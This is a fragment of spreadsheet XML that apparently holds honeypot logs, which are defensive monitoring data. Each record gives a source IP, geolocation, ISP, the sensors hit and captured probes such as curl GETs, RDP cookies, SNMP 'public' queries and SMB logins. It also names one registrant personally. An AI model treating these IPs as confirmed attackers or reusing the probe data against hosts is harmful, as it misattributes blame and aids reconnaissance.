    <t>SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>80&amp;&amp;23&amp;&amp;5692&amp;&amp;48309&amp;&amp;48321&amp;&amp;48333&amp;&amp;48348&amp;&amp;48367&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:78b3</t>
  </si>
  <si>
    <t>6cb92913be277f57743cae19927f14bd</t>
  </si>
  <si>
    <t>114.35.31.234</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-35-31-234.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;34821&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:1fea</t>
  </si>
  <si>
    <t>0e9942cf7582df54397889031ac3723c</t>
  </si>
  <si>
    <t>59.93.168.74</t>
  </si>
  <si>
    <t>::ffff:3b5d:a84a</t>
  </si>
  <si>
    <t>a4c05e2ca6d1d7d86b4f32df59a8c356</t>
  </si>
  <si>
    <t>115.96.95.146</t>
  </si>
  <si>
    <t>::ffff:7360:5f92</t>
  </si>
  <si>
    <t>146e4b107b2c3114f3f1a4978971dae1</t>
  </si>
  <si>
    <t>117.255.70.237</t>
  </si>
  <si>
    <t>::ffff:75ff:46ed</t>
  </si>
  <si>
    <t>a5b32681ff8ae135128e31b2720c1d94</t>
  </si>
  <si>
    <t>122.202.164.54</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7aca:a436</t>
  </si>
  <si>
    <t>3024e14dcecf9975f08d0f4bcd21df1b</t>
  </si>
  <si>
    <t>119.242.38.247</t>
  </si>
  <si>
    <t>FL1-119-242-38-247.iba.mesh.ad.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:77f2:26f7</t>
  </si>
  <si>
    <t>65e446c09253a1f546d6e9bb5ef07774</t>
  </si>
  <si>
    <t>119.47.241.200</t>
  </si>
  <si>
    <t>119-47-241-200.ppp.bbiq.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>Fukuoka</t>
  </si>
  <si>
    <t>Fukuoka City</t>
  </si>
  <si>
    <t>1863967</t>
  </si>
  <si>
    <t>33.5922</t>
  </si>
  <si>
    <t>130.399</t>
  </si>
  <si>
    <t>7679</t>
  </si>
  <si>
    <t>QTnet,Inc.</t>
  </si>
  <si>
    <t>QTnet, Inc.</t>
  </si>
  <si>
    <t>::ffff:772f:f1c8</t>
  </si>
  <si>
    <t>a4a4ed7bc46e5d0431bc71feae5efade</t>
  </si>
  <si>
    <t>220.134.152.32</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-134-152-32.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>23&amp;&amp;57341&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:9820</t>
  </si>
  <si>
    <t>c5ee24bb322134b556c057a58b27d100</t>
  </si>
  <si>
    <t>189.168.11.147</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>ZAC</t>
  </si>
  <si>
    <t>Zacatecas</t>
  </si>
  <si>
    <t>Guadalupe</t>
  </si>
  <si>
    <t>4005509</t>
  </si>
  <si>
    <t>22.7475</t>
  </si>
  <si>
    <t>-102.519</t>
  </si>
  <si>
    <t>Gestión de direccionamiento UniNet</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (189.168.11.147,53361)}&amp;&amp;{Data_SMB:Incoming connection (189.168.11.147,53457)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:bda8:b93</t>
  </si>
  <si>
    <t>b3a03a64c4c531c3f8f04be2ffed778d</t>
  </si>
  <si>
    <t>59.127.77.60</t>
  </si>
  <si>
    <t>59-127-77-60.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;65488&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7f:4d3c</t>
  </si>
  <si>
    <t>d565535053b158080884143216b79a56</t>
  </si>
  <si>
    <t>114.32.19.105</t>
  </si>
  <si>
    <t>::ffff:7220:1369</t>
  </si>
  <si>
    <t>a564838cd0675de5b20221cf1dc94f91</t>
  </si>
  <si>
    <t>188.115.141.127</t>
  </si>
  <si>
    <t>51</t>
  </si>
  <si>
    <t>Odesa</t>
  </si>
  <si>
    <t>Odeskyi Raion</t>
  </si>
  <si>
    <t>Lymanka</t>
  </si>
  <si>
    <t>9983758</t>
  </si>
  <si>
    <t>46.3856</t>
  </si>
  <si>
    <t>30.6774</t>
  </si>
  <si>
    <t>6876</t>
  </si>
  <si>
    <t>TENET Scientific Production Enterprise LLC</t>
  </si>
  <si>
    <t>TeNeT Networking Centre</t>
  </si>
  <si>
    <t>TeNeT Telecommunication Company</t>
  </si>
  <si>
    <t>2009-05-20</t>
  </si>
  <si>
    <t>::ffff:bc73:8d7f</t>
  </si>
  <si>
    <t>dc292937fa79b98ecc6e48fcf54842d7</t>
  </si>
  <si>
    <t>116.74.120.194</t>
  </si>
  <si>
    <t>::ffff:744a:78c2</t>
  </si>
  <si>
    <t>9ae09bfc32483fc250aaf77f5fefa1d3</t>
  </si>
  <si>
    <t>123.31.114.166</t>
  </si>
  <si>
    <t>::ffff:7b1f:72a6</t>
  </si>
  <si>
    <t>12d49558217885547f252acdd44af6fd</t>
  </si>
  <si>
    <t>198.44.136.205</t>
  </si>
  <si>
    <t>static-198-44-136-205.cust.tzulo.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_H43&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>liu jiachang</t>
  </si>
  <si>
    <t>2013-08-05</t>
  </si>
  <si>
    <t>::ffff:c62c:88cd</t>
  </si>
  <si>
    <t>339898f7746bc917e1cb3f8ba16cd138</t>
  </si>
  <si>
    <t>120.57.93.128</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>4457&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:7839:5d80</t>
  </si>
  <si>
    <t>cbe3cd5cd0a52b0d0df1f065c2f5798f</t>
  </si>
  <si>
    <t>46.42.119.52</t>
  </si>
  <si>
    <t>VIVA Broadband TB</t>
  </si>
  <si>
    <t>2010-08-04</t>
  </si>
  <si>
    <t>::ffff:2e2a:7734</t>
  </si>
  <si>
    <t>ae0ba701003d1334d2e2511b03eb93fa</t>
  </si>
  <si>
    <t>59.178.85.63</t>
  </si>
  <si>
    <t>::ffff:3bb2:553f</t>
  </si>
  <si>
    <t>cb97955c6c948ef3cccb33e55ee24590</t>
  </si>
  <si>
    <t>61.1.138.17</t>
  </si>
  <si>
    <t>2000-01-13</t>
  </si>
  <si>
    <t>::ffff:3d01:8a11</t>
  </si>
  <si>
    <t>0dd9ad8bcb793514bc8e1e1908cffda3</t>
  </si>
  <si>
    <t>59.182.250.188</t>
  </si>
  <si>
    <t>::ffff:3bb6:fabc</t>
  </si>
  <si>
    <t>2ca7dfc4508003abe2cfc4b1fcaec4ae</t>
  </si>
  <si>
    <t>121.185.40.120</t>
  </si>
  <si>
    <t>::ffff:79b9:2878</t>
  </si>
  <si>
    <t>9c32fdec96923a90d8b2660dc4319d95</t>
  </si>
  <si>
    <t>185.142.236.35</t>
  </si>
  <si>
    <t>wine.census.shodan.io&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_IMAP_H2&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_FTP_H4&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_RDP_H17&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_IRC_H19&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_MSSQL_H47&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_NTP_H25&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_ORACLE_H2&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_IRC_H28&amp;&amp;SMA-LAB_SMTP_H23&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_IRC_H10&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_IMAP_H3&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_PJL_H28&amp;&amp;SMA-LAB_IRC_H6&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_SMTP_H6&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_MYSQL_H40&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_SMTP_H36&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_SMTP_H9&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_IRC_H31&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_IRC_H34&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_REDIS_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;50448&amp;&amp;445&amp;&amp;443&amp;&amp;143&amp;&amp;1080&amp;&amp;3306&amp;&amp;389&amp;&amp;9100&amp;&amp;5432&amp;&amp;161&amp;&amp;6379&amp;&amp;5900&amp;&amp;21&amp;&amp;110&amp;&amp;1433&amp;&amp;1521&amp;&amp;3389&amp;&amp;6667&amp;&amp;NA&amp;&amp;12420&amp;&amp;25&amp;&amp;23183&amp;&amp;31231&amp;&amp;29011&amp;&amp;20041&amp;&amp;23&amp;&amp;26977&amp;&amp;23320&amp;&amp;80&amp;&amp;7349&amp;&amp;7605&amp;&amp;13443&amp;&amp;20217&amp;&amp;58720&amp;&amp;58732&amp;&amp;58722&amp;&amp;56272&amp;&amp;56282&amp;&amp;11187&amp;&amp;32335&amp;&amp;57908&amp;&amp;20270&amp;&amp;32243&amp;&amp;24858&amp;&amp;8108&amp;&amp;26260&amp;&amp;16655&amp;&amp;18438&amp;&amp;45138&amp;&amp;26810&amp;&amp;7525</t>
  </si>
  <si>
    <t>52.3702</t>
  </si>
  <si>
    <t>4.89517</t>
  </si>
  <si>
    <t>174</t>
  </si>
  <si>
    <t>Cogent Communications</t>
  </si>
  <si>
    <t>BlackHOST Ltd.</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;stshash&amp;&amp;command&amp;&amp;NA&amp;&amp;request&amp;&amp;login&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cyodgmwu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'FNJN0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'A001'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JOFD0'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=185.142.236.35;rport=26810'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'OEON0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42514)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42520)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42532)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42360)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42362)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42378)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'KKGN0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'FJBH0'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=c0q7f26u'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JHCM0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'ENNN0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'KBMB0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
